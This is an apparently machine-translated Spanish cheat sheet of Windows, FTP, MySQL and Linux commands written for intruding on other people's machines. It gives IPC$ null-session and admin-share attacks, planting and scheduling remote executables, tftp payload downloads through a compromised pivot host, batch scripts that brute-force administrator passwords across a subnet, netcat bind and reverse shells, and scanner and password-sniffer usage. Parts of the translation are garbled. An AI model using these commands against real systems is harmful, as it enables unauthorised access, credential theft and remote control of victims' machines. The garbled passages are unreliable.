Iniciar-ejecutar qué comandos se pueden ejecutar, escribirlos todos
net use \\ip\ipc$ " " /usuario:" " Establecer enlace vacío IPC
net use \\ip\ipc$ "Contraseña" /usuario:"Nombre de usuario " Establezca un enlace IPC no vacío
net use h: \\ip\c$ "contraseña" /usuario:"nombre de usuario" Después de iniciar sesión directamente, asigne el C: de la otra parte al H: local p>
net use h: \\ip\c$ Después de iniciar sesión, asigne la otra parte C: al local H:
net use \\ip\ipc$ /del elimine el IPC link
uso neto h: /del elimina la asignación de H: de la otra parte al local
nombre de usuario y contraseña del usuario neto/agregar crea un usuario
usuario de red invitado /activo: sí activa el usuario invitado
usuario de red Ver qué usuarios
nombre de cuenta de usuario de red Ver propiedades de la cuenta
nombre de usuario de administradores de grupo local de red /add Agregar "usuario" al administrador. En él, tiene derechos de administrador. Nota: agregue s después del administrador para usar la forma plural
net start Compruebe qué servicios están habilitados
net start. el nombre del servicio inicia el servicio (por ejemplo: net start telnet, net start Schedule)
net stop nombre del servicio para detener un servicio
hora neta \\ ip de destino verifique la dirección IP de la otra parte; time
net time \\target ip /set Configure la hora de la computadora local para que se sincronice con la hora del host "target IP" y agregue el parámetro /yes para cancelar el mensaje de confirmación
net view para ver qué *** recursos compartidos están habilitados en la LAN local
net view \\ip Ver qué recursos compartidos de VPN están habilitados en la LAN de la otra parte
net config muestra la configuración de red del sistema
cierre de sesión de red desconecta los recursos compartidos de VPN
nombre del servicio de pausa de red para pausar un servicio
"mensaje de texto" de IP de envío de red para enviar información al otra parte
tipo de conexión de red net ver e información que se utiliza en la LAN
net share Ver recursos compartidos *** habilitados localmente
net share ipc$ Habilitar ipc $*** acciones
net share ipc$ /del Eliminar ipc$** *share
net share c$ /del Eliminar C: ***share
usuario de red invitado 12345 Después de iniciar sesión como usuario invitado, cambie la contraseña a 12345
contraseña de red Cambiar contraseña contraseña de inicio de sesión del sistema
netstat -a Verifique qué puertos están abiertos y se usan comúnmente netstat -an
netstat -n Verifique el estado de la conexión de red del puerto, uso común netstat -an
netstat -v Ver el trabajo en curso
netstat -p Ejemplo de nombre de protocolo: netstat -p tcq/ip Ver el uso de un determinado protocolo (verifique el uso del protocolo tcp/ip) p>
netstat -s Ver el uso de todos los protocolos en uso
nbtstat -A ip Si uno de los puertos 136 a 139 de la otra parte está abierto, puede ver el nombre de usuario del inicio de sesión reciente de la otra parte (antes de 03 es el nombre de usuario). Nota: el parámetro -A debe estar en mayúscula p>
tracert - parámetro ip (o nombre de la computadora)
Traceroute (paquete), parámetro: "-w número" se utiliza para establecer el intervalo de tiempo de espera.
Ping ip (o nombre de dominio) envía datos con un tamaño predeterminado de 32 bytes al otro host Parámetros: "-l [espacio] tamaño del paquete"; "-n número de veces para enviar datos" ; "-t "se refiere a hacer ping todo el tiempo.
ping -t -l 65550 ip ping of death (enviar archivos de más de 64K y hacer ping todo el tiempo se convierte en el ping de la muerte)
ipconfig (winipcfg) para Windows NT y XP (Windows 95 98) Para ver la dirección IP local, ipconfig puede usar el parámetro "/all" para mostrar toda la información de configuración
tlist -t muestra los procesos en una lista de líneas de árbol (es una herramienta adicional para el sistema y no se instala de forma predeterminada en la carpeta Soporte/herramientas del directorio de instalación)
kill -F Agregue el parámetro -F al nombre del proceso para forzar el final de un proceso (es un. herramienta adicional para el sistema, que no está instalada de forma predeterminada en el soporte del directorio de instalación /carpeta herramientas)
Agregue el parámetro -F al nombre del archivo del -F para eliminar el archivo de solo lectura. /AR, /AH, /AS y /AA representan la eliminación de archivos de solo lectura, ocultos y del sistema respectivamente, archivos de almacenamiento, /A-R, /A-H, /A-S, /A-A significan eliminar archivos que no sean de lectura. Sólo archivos ocultos, del sistema y de almacenamiento. Por ejemplo, "DEL/AR *.*" significa eliminar todos los archivos de solo lectura en el directorio actual, y "DEL/A-S *.*" significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema
#2 2:
del /S /Q directorio o use: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos bajo el directorio. Al mismo tiempo, use el parámetro /Q para cancelar la operación de eliminación y elimínela directamente después de que el sistema la confirme.
(Los dos comandos tienen el mismo efecto)
mover letra de unidad\ruta\nombre del archivo a mover ruta para almacenar el archivo movido\nombre del archivo después de mover para mover el archivo, use el parámetro /y para cancelar la confirmación de que existe el mismo archivo en el directorio movido. Sobrescriba directamente las indicaciones
fc one.txt two.txt > 3st.txt. Compare los dos archivos y envíe las diferencias al archivo 3st.txt. "> " y "> >" son duplicados. El comando dirigido
en el número de identificación inicia una tarea programada registrada
en /delete detiene todas las tareas programadas. Utilice el parámetro /yes para detener. directamente sin confirmación
en el número de identificación/eliminar Detener una tarea programada registrada
en Ver todas las tareas programadas
en \\ip hora nombre del programa (o un comando ) /r Ejecute un determinado programa en el otro lado en un momento determinado y reinicie la computadora
finger nombre de usuario @host para ver qué usuarios han iniciado sesión recientemente
telnet ip puerto remoto y servidor de inicio de sesión, el puerto predeterminado es 23
open ip se conecta a IP (un comando después de iniciar sesión en telnet)
telnet Escriba telnet directamente en la máquina local para ingresar al telnet local
copiar ruta\nombre de archivo 1 ruta\nombre de archivo 2 /y Copie el archivo 1 al directorio especificado como archivo 2. Utilice el parámetro /y para cancelar la confirmación de que desea sobrescribir un archivo de directorio existente
copiar c:\srv.exe \ \ip\admin$ Copiar c:\srv.exe local al administrador de la otra parte
cppy 1st.jpg/b+2st.txt/a 3st.jpg Oculte el contenido del 2st.txt al 1st. Genere un nuevo archivo 3st.jpg en jpg. Nota: El encabezado del archivo 2st.txt debe tener tres filas vacías: /b se refiere al archivo binario, /a se refiere al ASCLL. formatear archivo
copiar \\ip\admin$ \svv.exe c:\ o:copiar\\ip\admin$\*.* Copiar los archivos srv.exe (todos los archivos) compartidos por el otro admini$*** de la parte a C local:
xcopy La dirección de destino del archivo o árbol de directorios que se va a copiar\nombre del directorio para copiar el archivo y el árbol de directorios, use el parámetro /Y para sobrescribir el mismo archivo sin preguntar
tftp -i propia IP (esto se usa cuando se usa la máquina de carne como trampolín) IP de la máquina) get server.exe c:\server.exe Después de iniciar sesión, descargue server.exe de "IP" al host de destino c:\server.exe Parámetro: -i significa transferir en modo binario, como cuando se transfieren archivos exe, si no se agrega -i, la transmisión se realizará en modo ASCII (archivo de texto). modo de transmisión)
tftp -i La IP de la otra parte puso c:\server.exe Después de iniciar sesión, cargue el c:\server.exe local en el host
La IP ftp El puerto se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. bin se refiere a la transmisión en modo binario (entrada de archivo ejecutable); el valor predeterminado es la transmisión en formato ASCII (archivo de texto)
la impresión de ruta muestra la ruta IP, que mostrará principalmente la dirección de red, la dirección de red y la máscara de subred. Máscara de red, dirección de puerta de enlace Dirección de puerta de enlace, dirección de interfaz Interfaz
arp Ver y procesar el caché ARP ARP significa resolución de nombres y es responsable de analizar una IP en una dirección MAC física.
arp -a mostrará toda la información
nombre o comando del programa de inicio /max o /min para abrir una nueva ventana y maximizar (minimizar) ejecutar un programa o comando
mem Ver el uso de la CPU
nombre de archivo de atributo (nombre de directorio) Ver los atributos de un archivo (directorio)
nombre de archivo de atributo-A -R -S -H o +A +R + S +H elimina (agrega) los atributos de archivo, de solo lectura, de sistema y ocultos de un determinado archivo; use + para agregarlo como un determinado atributo
dir Ver archivos, parámetros: /Q muestra en qué sistema están los archivos; y los directorios pertenecen al Usuario, /T:C muestra la hora de creación del archivo, /T:A muestra la última vez que se accedió al archivo, /T:W hora de la última modificación
fecha /t, hora /t Utilice este parámetro que es "FECHA/T", "HORA/T" solo mostrará la fecha y hora actuales sin tener que ingresar una nueva fecha y hora
establezca Especifique el nombre de la variable de entorno = el carácter a asignarse a la variable Establecer la variable de entorno
p>set muestra todas las variables de entorno actuales
set p (u otros caracteres) muestra todas las variables de entorno actuales que comienzan con el carácter p (u otros caracteres) caracteres)
pausa Pausa el programa por lotes y muestra: Presione cualquier tecla para continuar....
si realiza un procesamiento condicional en el programa por lotes (consulte si el comando y las variables para obtener más información instrucciones)
La etiqueta Goto dirige cmd.exe a la línea etiquetada en el programa por lotes (la etiqueta debe ser una línea separada y precedida por dos puntos, por ejemplo: etiqueta ":start")
ruta de llamada\nombre del archivo por lotes Llama a otro programa por lotes desde dentro de un programa por lotes (consulte llamar a /? para obtener más instrucciones)
para Ejecutar un comando específico en cada archivo de un conjunto de archivos (consulte el comando for y la variable)
echo activado o desactivado activa o desactiva el eco. Si solo se utiliza echo sin parámetros, se mostrará la configuración actual del eco
se mostrará la información del eco. en la pantalla
información de eco>> pass.txt Guarde "información" en el archivo pass.txt
findstr "Hello" aa.txt Busque la cadena hola en aa.txt archivo
buscar nombre de archivo para buscar un archivo
título nombre del título cambia el nombre del título de la ventana CMD
color valor del color establece el color de primer plano y fondo del cmd consola 0=negro, 1=azul, 2=verde, 3=verde claro, 4=rojo, 5=morado, 6=amarillo, 7=blanco, 8=gris, 9=azul claro, A=verde claro, B; =verde claro, C=rojo claro, D= violeta claro, E=amarillo claro, F=blanco brillante
el nombre del mensaje cambia el símbolo del sistema mostrado por cmd.exe (cambie C:\, D:\ a: EntSky\)
#3 Tres:
ver muestra información de la versión en la ventana de DOS
winver abre una ventana para mostrar información de la versión (tamaño de la memoria , versión del sistema, versión del parche, nombre de la computadora)
formatear letra de unidad/FS: tipo formatear disco, tipo: FAT, FAT32, NTFS, ejemplo: Formato D: /FS:NTFS
md nombre del directorio para crear el directorio
reemplazar El directorio donde se reemplazará el archivo fuente reemplaza el archivo
ren El nombre del archivo original es el nuevo nombre del archivo y el nombre del archivo es renombrado
árbol Muestra el directorio en una estructura de árbol, con el parámetro - f enumerará los nombres de los archivos en la carpeta
escriba el nombre del archivo muestra el contenido del archivo de texto
más nombre de archivo muestra el archivo de salida pantalla por pantalla
doskey Para comando bloqueado = carácter
comando doskey para desbloquear = bloquear comando proporcionado para DOS (editar línea de comando
, llame nuevamente al comando win2k y cree una macro). Por ejemplo: comando lock dir: doskey dir=entsky (no se puede usar doskey dir=dir desbloquear: doskey dir=
taskmgr abre el administrador de tareas
chkdsk /F D: comprobar el disco D y muestre el informe de estado; agregue el parámetro /f y corrija el error en el disco
tlntadmn telnt service admn, escriba tlntadmn y seleccione 3, luego seleccione 8, puede cambiar el puerto predeterminado del servicio telnet; 23 a cualquier otro puerto
salir sale del programa cmd.exe o del actual. Utilice el parámetro /B para salir del script por lotes actual en lugar de cmd.exe
ruta ruta\ejecutable. El nombre del archivo es ejecutable. El archivo establece una ruta.
cmd inicia una ventana de interpretación de comandos de win2K. Parámetros: /eff, /en desactivar y activar la expansión del comando; para obtener instrucciones más detalladas, consulte cmd /?
regedit /s El nombre del archivo de registro se importa al registro al que se refiere; importación en modo silencioso, sin ningún mensaje
regedit /e Nombre del archivo de registro exporta el registro
El parámetro de nombre de archivo cacls muestra o modifica la lista de control de acceso a archivos (ACL) - para NTFS; formato. Parámetros: /D nombre de usuario: configurado para denegar el acceso a un determinado usuario; /P nombre de usuario: permanente reemplaza los derechos de acceso del usuario especificado; /G nombre de usuario: permanente otorga derechos de acceso al usuario especificado. Puede ser: N ninguno, R; lee, W escribe, C cambia (escribe), F controla completamente, por ejemplo: cacls D:\test.txt /D pub establece d:\test.txt para denegar el acceso al usuario pub.
nombre de archivo cacls para ver la lista de permisos de usuario de acceso a archivos
Contenido de texto REM para agregar comentarios en el archivo por lotes
netsh para ver o cambiar la red local configuración
#4 Cuatro:
Comando de servicio IIS:
iisreset /reboot Reinicia la computadora win2k (pero aparece un mensaje solicitando que el sistema se reinicie) p>
iisreset /start o stop inicia (detiene) todos los servicios de Internet
iisreset /restart detiene y reinicia todos los servicios de Internet
iisreset /status muestra el estado de todos los servicios de Internet
iisreset /enable or enable Habilita (deshabilita) el reinicio del servicio de Internet en el sistema local
iisreset /rebootonerror Al iniciar, detener o reiniciar el servicio de Internet, si ocurre un error
>iisreset /noforce Si no se puede detener el servicio de Internet, el servicio de Internet no se cancelará por la fuerza
iisreset /timeout Val no ha detenido el servicio de Internet cuando se excedió el tiempo (segundos ) si se alcanza el parámetro /rebootonerror, la computadora se reiniciará. El valor predeterminado es 20 segundos para reiniciar, 60 segundos para detener y 0 segundos para reiniciar.
Comando FTP: (los detalles se explican más adelante)
El formato de línea de comando de ftp es:
ftp -v -d -i -n -g[ nombre de host] -v muestra toda la información de respuesta del servidor remoto.
-d usa el modo de depuración.
-n restringe el inicio de sesión automático de ftp, es decir, no utiliza el archivo .netrc.
-g Cancela el nombre del archivo global.
ayuda [comando] o ? [Comando] Ver la descripción del comando
adiós o salir finaliza el proceso FTP del host y sale del modo de administración FTP
pwd enumera el directorio del host remoto actual
. poner o enviar el nombre del archivo local [nombre del archivo cargado en el host] para transferir un archivo local al host remoto
obtener o recibir [nombre del archivo del host remoto] [nombre del archivo descargado al local] desde Transferir un lote de archivos del host remoto al host local
mget [remote-files] Recibir un lote de archivos del host remoto al host local
mput local-files Transferir un lote de archivos al host local Transferir archivos al host remoto
dir o ls [directorio-remoto] [archivo-local] enumera los archivos en el directorio del host remoto actual. Si hay archivos locales, escriba. los resultados al archivo local
ascii Configurar para enviar archivos en modo ASCII (valor predeterminado)
bin o image Configurar para enviar archivos en modo binario
bell Cada vez que se completa una transferencia de archivos, el mensaje de alarma
cdup regresa al directorio anterior
cerrar interrumpe la sesión ftp con el servidor remoto (correspondiente a abrir)
abrir host[puerto] establece la conexión del servidor ftp especificado, puede especificar el puerto de conexión
delete elimina archivos en el host remoto
mdelete [remote-files] elimina un lote de files
mkdir nombre-directorio Crea un directorio en el host remoto
rename [from] [to] Cambia el nombre del archivo en el host remoto
directorio rmdir -name Eliminar el directorio en el host remoto
el estado muestra el estado actual de FTP
el sistema muestra el tipo de sistema del host remoto
usuario nombre de usuario [contraseña] [cuenta] Vuelva a iniciar sesión en el host remoto con otro nombre de usuario host
abrir host [puerto] restablecer una nueva conexión
modo de aviso interactivo
macdef define macro comando
lcd change El directorio de trabajo actual del host local Si es predeterminado, vaya al directorio HOME del usuario actual
chmod cambia los permisos de archivo del host remoto<. /p>
case Cuando esté activado, use el comando MGET Copie los nombres de los archivos a la máquina local y conviértalos todos a letras minúsculas
cd remote-dir ingresa al directorio del host remoto
cdup ingresa al directorio principal del directorio del host remoto
! Ejecute un shell interactivo en la máquina local, salga y regrese al entorno ftp, como!ls*.zip
#5 Cinco:
Comando MYSQL:
mysql -h dirección de host -u nombre de usuario -p contraseña para conectarse a MYSQL si acaba de instalar MYSQL, el superusuario; root no tiene contraseña.
(Ejemplo: mysql -h110.110.110.110 -Uroot -P123456
Nota: u y root no necesitan agregar espacios, lo mismo aplica para los demás)
salir Salir de MYSQL
mysqladmin -u nombre de usuario -p contraseña anterior contraseña nueva contraseña cambiar contraseña
conceder selección en la base de datos.* al nombre de usuario@inicio de sesión host identificado por \"contraseña\" "; Agregar nuevos usuarios.
(Nota: a diferencia de lo anterior, los siguientes son comandos en el entorno MYSQL, por lo que van seguidos de un punto y coma como terminador del comando)
mostrar bases de datos; Al principio solo existían dos bases de datos: mysql y test. La biblioteca mysql es muy importante. Contiene información del sistema MYSQL. Cuando cambiamos contraseñas y agregamos nuevos usuarios, en realidad usamos esta biblioteca para las operaciones.
usar mysql;
mostrar tablas; mostrar las tablas de datos en la biblioteca
describir el nombre de la tabla; p>crear nombre de base de datos; crear base de datos
usar nombre de base de datos
crear nombre de tabla de tabla (lista de configuración de campo
eliminar nombre de base de datos); ;
eliminar el nombre de la tabla; eliminar la base de datos y la tabla
eliminar del nombre de la tabla; borrar los registros en la tabla
seleccionar * del nombre de la tabla; datos en la tabla Registro
mysqldump --opt school>school.bbb Copia de seguridad de la base de datos: (El comando se ejecuta en el directorio \\mysql\\bin de DOS Nota: Realice una copia de seguridad de la base de datos school en); el archivo school.bbb, school.bbb es un archivo de texto. Puede elegir cualquier nombre de archivo. Ábralo y encontrará nuevos descubrimientos.
Nuevos comandos bajo el sistema win2003 (parte práctica):
apagar /parámetro Apagar o reiniciar el host local o remoto.
Descripción del parámetro: /S apaga el host, /R reinicia el host, /T establece digitalmente el tiempo de retardo, que oscila entre 0 y 180 segundos, /A cancela el arranque, /M //IP especificada remota anfitrión.
Ejemplo: apagado /r /t 0 Reinicia el host local inmediatamente (sin demora)
taskill /parámetro nombre del proceso o pid del proceso Termina una o más tareas y procesos.
Descripción del parámetro: /PID es el pid del proceso a terminar. Puede usar el comando tasklist para obtener el pid de cada proceso, /IM es el nombre del proceso a terminar, /. F es terminar el proceso por la fuerza, /T es terminar el proceso especificado y el proceso hijo que inició.
La lista de tareas muestra los identificadores de proceso (PID) de los procesos, servicios y procesos de servicio que se ejecutan actualmente en hosts locales y remotos.
Descripción del parámetro: /M enumera los archivos dll cargados por el proceso actual, /SVC muestra los servicios correspondientes a cada proceso y, sin parámetros, solo se enumera el proceso actual.
#6 Seis:
Comandos básicos en el sistema Linux: distingue entre mayúsculas y minúsculas
uname muestra información de la versión (igual que la versión win2K)
dir muestra los archivos en el directorio actual, ls -al muestra los archivos ocultos (igual que dir en win2K)
pwd consulta la ubicación del directorio actual
cd cd ..volver a la página anterior Directorio de capas, tenga en cuenta que hay un espacio entre cd y... cd /regresar al directorio raíz.
nombre del archivo cat Ver contenido del archivo
cat >abc.txt Escriba el contenido en el archivo abc.txt.
más nombre de archivo Muestra un archivo de texto página por página.
cp copia archivos
mv mueve archivos
rm nombre de archivo elimina archivos, rm -a nombre de directorio elimina directorios y subdirectorios
mkdir nombre del directorio crea un directorio
rmdir elimina un subdirectorio y no hay documentos en el directorio.
chmod establece los permisos de acceso de archivos o directorios
grep busca cadenas en archivos
comparación de archivos diff
buscar búsqueda de archivos
fecha Fecha y hora actual
quién Consulta las personas que actualmente utilizan la misma máquina que usted y la hora y ubicación de inicio de sesión
w Consulta la información detallada de los usuarios actuales
whoami Ver el nombre de tu cuenta
grupos Ver el grupo de alguien
contraseña Cambiar contraseña
historial Ver tus propios comandos pasados
ps muestra el estado del proceso
kill detiene un proceso
gcc Los piratas informáticos suelen usarlo para compilar archivos escritos en lenguaje C
Sus permisos se convierten a usuarios designados
telnet IP telnet se conecta al otro host (igual que win2K). Cuando aparece bash$, la conexión es exitosa.
ftp ftp se conecta a un servidor (igual que win2K)
Adjunto: comandos por lotes y variables
1: Formato básico de comandos y variables: p >
FOR /parameter%variable IN (set) DO comando [command_parameters] %variable: especifique un parámetro reemplazable de una sola letra, como: %i, y especifique una variable con: %%i, y al llamar a Uso de variable: %i%, las variables distinguen entre mayúsculas y minúsculas (%i no es igual a %I).
El procesamiento por lotes puede procesar de %0 a %9***10 variables cada vez, de las cuales %0 tiene como valor predeterminado el nombre del archivo por lotes y %1 tiene como valor predeterminado el que se ingresa al usar este lote. primer valor, de manera similar: %2-%9 se refiere al valor ingresado del 2 al 9, por ejemplo: net use \\ip\ipc$ pass /user:user donde ip es %1, pass es %2, usuario para %3;
(set): Especifique uno o un grupo de archivos, puede usar comodines, como: (D:\user.txt) y (1 1 254) (1 -1 254), { " (1 1 254)" El primer "1" se refiere al valor inicial, el segundo "1" se refiere al incremento, y el tercero "254" se refiere al valor final, es decir: de 1 a 254; "(1 -1 254 )" descripción: de 254 a 1 }
comando: especifique el comando que se ejecutará en el archivo, como por ejemplo: comando net use; si desea ejecutar varios comandos, agregue: & a separe los comandos.
command_parameters: especifique parámetros o interruptores de línea de comando para comandos específicos.
IN (set): se refiere a tomar el valor en (set); ejecutando el comando
Parámetros: /L significa usar forma incremental {cuando (set) está en forma incremental} /F significa obtener valores continuamente del archivo hasta que esté terminado {cuando (set) es un archivo, como (d:\ pass.txt)}.
Ejemplo de uso:
@echo off
formato de uso de eco: test.bat *.*.* > test.txt
para /L %%G en (1 1 254) haga eco %1.%%G >>test.txt y use net \\%1.%%G /user:administrator busque "Comando completado exitosamente" >>prueba | .txt
Guardar como test.bat Descripción: intente establecer una conexión IPC$ con una contraseña de administrador vacía para las 254 IP en un segmento de red de clase C específico. Si tiene éxito, guarde la IP en test.txt. medio.
/L se refiere a la forma incremental (es decir, de 1-254 o 254-1); los primeros tres dígitos de la IP de entrada: *.*.* es el %1 predeterminado para el procesamiento por lotes; %G es variable (el último dígito de ip); & se usa para separar los dos comandos echo y net use | significa que después de crear ipc$, use buscar en los resultados para ver si hay un mensaje de "comando completado con éxito"; ; %1.% %G es la dirección IP completa (1 1 254) se refiere al valor inicial, la cantidad de crecimiento y el valor final.
@echo desactivado
formato de uso de eco: ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb. exe %1 %%i D:\pass.dic 200
Guardar como: ok.exe Descripción: Después de ingresar una IP, use el archivo de diccionario d:\pass.dic para descifrar d:\user. La contraseña del usuario en dic hasta que se agote el valor del archivo. %%i es el nombre de usuario; %1 es la dirección IP ingresada (predeterminada).
#7 Siete:
2: Formato básico del comando if y las variables:
IF [not] declaración de comando numérico de nivel de error Si el programa se ejecuta y finalmente regresa un valor igual o un código de salida mayor que el número especificado, la condición especificada es "verdadera".
Ejemplo: el comando IF errorlevel 0 significa que cuando el valor devuelto después de la ejecución del programa es 0, se ejecutará el comando después de la línea; IF not errorlevel 1 significa que el valor devuelto después de la ejecución del programa no es igual. a 1, entonces se ejecutará el siguiente comando.
0 significa que fue descubierto y ejecutado exitosamente (verdadero); 1 significa que no fue descubierto ni ejecutado (falso).
IF [not] Cadena 1==Cadena 2 Declaración de comando Si la cadena de texto especificada coincide (es decir: la Cadena 1 es igual a la Cadena 2), se ejecutará el siguiente comando.
Ejemplo: "if "%2%"=="4" ir a inicio" significa: si la segunda variable ingresada es 4, ejecute el siguiente comando (nota: cuando llame a una variable, use % nombre de variable % y agregue " ")
SI [no] existe declaración de comando de nombre de archivo Si el nombre de archivo especificado existe, se ejecutará el siguiente comando.
Ejemplo: "si no nc.exe ir al final" significa: si no se encuentra el archivo nc.exe, salte a la etiqueta ":end".
IF [no] declaración de comando numérico de nivel de error else declaración de comando o IF [no] cadena 1==cadena 2 declaración de comando else declaración de comando o IF [no] existe nombre de archivo declaración de comando else declaración de comando más Arriba: Después de la declaración del comando else, se refiere a: cuando la condición anterior no es verdadera, se refiere al comando después de else. Nota: else debe estar en la misma línea que para ser válido.
Cuando hay un comando del, todo el contenido del comando del debe estar encerrado en < >, porque el comando del solo se puede ejecutar en una línea separada. Después de usar < >, es equivalente a una línea separada, por ejemplo: "si existe test.txt. else echo test.txt.missing", preste atención al "." en el comando
(2) Comandos externos del sistema (ambos requieren descarga). herramientas relevantes):
1, navaja suiza: nc.exe
Descripción del parámetro:
-h Ver información de ayuda
- d Modo en segundo plano
-e prog Redirección del programa, ejecutado tan pronto como se establece la conexión [peligroso]
-i intervalo de retardo de segundos
-l modo de escucha , utilizado para conexiones entrantes
-L modo de monitoreo, continúa monitoreando después de cerrar la conexión, hasta CTR+C
-n dirección IP, el nombre de dominio no se puede usar
-o la película graba la transmisión hexadecimal
p>
-p[espacio]Número de puerto local
-r Puerto local y remoto aleatorio
-t Use el modo de interacción Telnet
-u modo UDP
-v salida detallada, use -vv para ser más detallado
-w retardo de tiempo de espera digital intervalo
-z apaga la entrada y salida (cuando se usa para barrer anclas)
Uso básico:
nc -nvv 192.168.0.1 80 Conectar al puerto 80 del host 192.168.0.1
nc -l - p 80 Abre el puerto TCP local 80 y escucha
nc -nvv -w2 -z 192.168.0.1 80-1024 Barre el 80 -1024 puertos de 192.168.0.1
nc - l -p 5354 -t -e c:winntsystem32cmd.exe Vincula el cmdshell del host remoto al puerto TCP 5354 remoto
nc - t -e c:winntsystem32cmd.exe 192.168.0.2 5354 Vincula el cmdshell del host remoto y conecta de forma inversa al puerto 5354 de 192.168.0.2
Uso avanzado:
nc -L -p 80 Use 1 como honeypot: abra y monitoree el puerto 80 hasta CTR +C hasta nc -L -p 80 > c:\log.txt Use 2 como honeypot: abra y monitoree continuamente el puerto 80 hasta CTR+C, y genere el resultados en c: \log.txt
nc -L -p 80 < c:\honeyport.txt Utilice 3-1 como honeypot: abra y escuche el puerto 80 continuamente hasta CTR+C, y ponga c: El contenido de \honeyport.txt se envía a la canalización y también se puede utilizar para transferir archivos
type.exe c:\honeyport | nc -L -p 80 Utilice 3-2 como honeypot. : La apertura no monitorea el puerto 80 continuamente hasta CTR+C y envía el contenido en c:\honeyport.txt al canal, que también se puede usar para transferir archivos
Usar en esta máquina: nc - l -p Puerto local
Uso en el host de la otra parte: nc -e cmd.exe IP local -p Puerto local *win2K
nc -e /bin/sh IP local - p puerto local *linux, conexión inversa unix para atravesar el firewall del otro host
Usar en la máquina local: nc -d -l -p puerto local Uso en el host de la otra parte: nc -vv IP local puerto local> almacenamiento La ruta y el nombre del archivo. Transfiera el archivo al host de la otra parte Observaciones: | comando de canalización < o > comando de redirección. "<", por ejemplo: tlntadmn < test.txt significa asignar el contenido de test.txt al comando tlntadmn @ significa ejecutar el comando después de @, pero no se mostrará (ejecución en segundo plano ); por ejemplo: @ dir c:\winnt >> d:\log.txt significa: ejecutar dir en segundo plano y almacenar el resultado en d:\log.txt >La diferencia entre >> ">" significa: sobrescribir; ">>" significa: guardar en (agregar a). Por ejemplo: @dir c:\winnt >> d:\log.txt y @dir c:\winnt > d:\log.txt ejecutan dos comandos respectivamente para comparar: use >> El resultado de la segunda vez se guarda, mientras que el resultado de :> es solo el resultado de la primera vez, porque el resultado de la segunda vez sobrescribe el resultado de la primera vez. #8 Ocho: 2. Herramienta de escaneo de anclaje: xscan.exe Formato básico xscan -host xscan -file Elementos de detección -active Compruebe si el host está activo -os Detect el tipo de sistema operativo remoto (a través de los protocolos NETBIOS y SNMP) -port Detecta el estado del puerto de los servicios más utilizados -ftp Detecta contraseñas débiles de FTP - pub Detecta permiso de escritura de usuario anónimo del servicio FTP -pop3 Detecta contraseñas débiles del servidor POP3 -smtp Detecta vulnerabilidades del servidor SMTP -sql Detecta el servidor SQL contraseñas débiles -smb detecta contraseñas débiles de NT-Server -iis detecta vulnerabilidades de codificación/decodificación de IIS -cgi detecta vulnerabilidades CGI - nasl Cargar script de ataque Nessus -all Detectar todos los elementos anteriores Otras opciones -i número de adaptador Configura el adaptador de red, -l Mostrar todos los adaptadores de red -v Mostrar el progreso del análisis detallado -p Omitir hosts que no responden -o Omitir hosts sin puertos abiertos detectados -t Número de subprocesos simultáneos, el número de hosts simultáneos especifica el número máximo de subprocesos simultáneos y el número de hosts simultáneos, el número predeterminado es 100,10 -nombre del archivo de registro especifica el nombre del archivo del informe de escaneo (sufijo: archivo en formato TXT o HTML) Ejemplo de uso xscan -host 192.168. 1.1-192.168.255.255 -all -active -p detecta todas las vulnerabilidades de los hosts en el segmento de red 192.168.1.1-192.168.255.255 y omite los hosts que no responden xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o Detecta el estado del puerto estándar de los hosts en el segmento de red 192.168.1.1-192.168.255.255 Para usuarios de contraseñas débiles de NT, el número máximo de subprocesos simultáneos es 150, omitiendo los hosts sin puertos abiertos detectados. p> xscan -file hostlist.txt -port -cgi -t 200,5 -v -o Detecta el estado del puerto estándar y las vulnerabilidades CGI de todos los hosts enumerados en el archivo "hostlist.txt". El número máximo de concurrentes. Los subprocesos son 200 y se pueden detectar un máximo de 5 máquinas al mismo tiempo. Host, mostrar el progreso de detección detallado, omitir hosts sin puertos abiertos detectados #9 Nueve: 3. Rastreador de línea de comando: xsniff.exe Puede capturar contraseñas de protocolo FTP/SMTP/POP3/HTTP en la LAN Descripción de parámetros -tcp salidas TCP datagramas -udp genera informe de datos UDP -icmp genera datagrama ICMP -pasa información de contraseña de filtro -oculta ejecución en el fondo -host resolver nombre de host -addr dirección IP filtrado dirección IP -puerto puerto puerto de filtrado -log filename guarda la salida en un archivo -asc genera en formato ASCII -hex genera en formato hexadecimal Ejemplo de uso xsniff.exe -pass -hide -log pass.log se ejecuta en segundo plano para rastrear contraseñas y guardar la información de las contraseñas en el archivo pass.log xsniff.exe -tcp -udp -asc - addr 192.168.1.1 detecta 192.168.1.1 y filtra información tcp y udp y la genera en formato ASCII